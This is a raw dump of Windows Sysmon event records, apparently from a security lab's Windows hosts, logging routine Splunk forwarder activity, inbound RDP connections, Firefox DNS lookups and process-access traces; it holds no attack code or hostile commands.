23542300x80000000000000001051118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:23.399{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC7965BF2AF0D6C0815B982F29F4B41B,SHA256=27BFFD25F0397C7088D5DB9C0FB93EEC01E050444788B5D95B2C10E57EC1CB0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:23.327{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DFD2B85997ADE5F4932A5421FC70B14,SHA256=282702B3F3A225A1CC83BAD0991DDE3EBC73A1EF43C12664E0A8EBABAE0D15B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979714Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:20.791{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56547-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979713Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:23.641{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FBDDBA512FAA6F0E6179D6B1F89864C,SHA256=F0C6ED3FBFD5EE812C9267634D107AA0C6DF35DF98252CEACD394EBA2967E990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979712Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:23.641{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C384069DA437D341E1C05A08DA0E6027,SHA256=CD684A1D7C38F1CF7426485E831B2DA4F32929609F0786AA2910A459583669FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979711Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:23.204{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5756020831A2E779083AAEF58445CC5,SHA256=72AE222A3788ADF93B97968EDAB26330FD9167914D63691B020388EE012BE16D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.909{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53434-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001051115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.741{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56499-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 22542200x80000000000000001051114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.105{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www-google-analytics.l.google.com0142.250.184.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.069{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www.gitbook.com0::ffff:104.18.8.111;::ffff:104.18.9.111;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001051124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:24.751{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:24.751{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:24.704{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:24.704{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:24.342{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2587EA40D26A14CCA903AE93EBF4B19,SHA256=E041779DD996C7F44833EC9D83775A39460C7BDDD4E697C9515C15D3054B18DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979715Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:24.219{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60FC27376CB5A00D2C8DA1D60E47F6AD,SHA256=5FA923EEB8C4CABB8B3AA79FFAFFA43210694DBDD632475B70A9ADF671B187C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:25.351{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6DB556A0F6A0133D2C868AD858A407,SHA256=5E83DB31B504D685084D3AACDC267504D437979ADDEB0273F77AF733AE6EB76D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979732Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.891{69CF5F33-8BE9-6151-E379-00000000FD01}22921500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979731Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BE9-6151-E379-00000000FD01}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979730Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979729Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979728Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979727Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979726Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979725Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979724Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979723Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979722Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8BE9-6151-E379-00000000FD01}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979721Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979720Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.704{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BE9-6151-E379-00000000FD01}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979719Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.689{69CF5F33-8BE9-6151-E379-00000000FD01}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000979718Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:22.441{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54397-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979717Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.235{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82509D839A97CC5AA722F0C0204B7BD1,SHA256=A26E8103FE308E8764D414EBE5DCAB22453C260FFE21059D06BC77EF76AF39C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979716Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:25.141{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FBDDBA512FAA6F0E6179D6B1F89864C,SHA256=F0C6ED3FBFD5EE812C9267634D107AA0C6DF35DF98252CEACD394EBA2967E990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:26.682{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9677EC9911381D7BC09ADC81A1583FD,SHA256=205DD66DE0C5D07519CD871A6A95B936C3F304414561043C2EBCE529CFEEDD0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:26.358{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=660D1E16682F68DE8AA0D4183DA574B7,SHA256=7532B4A770ECDF85878B126009D100E896207CA5504C7EA28E3AAD004157D116,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979762Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BEA-6151-E579-00000000FD01}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979761Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 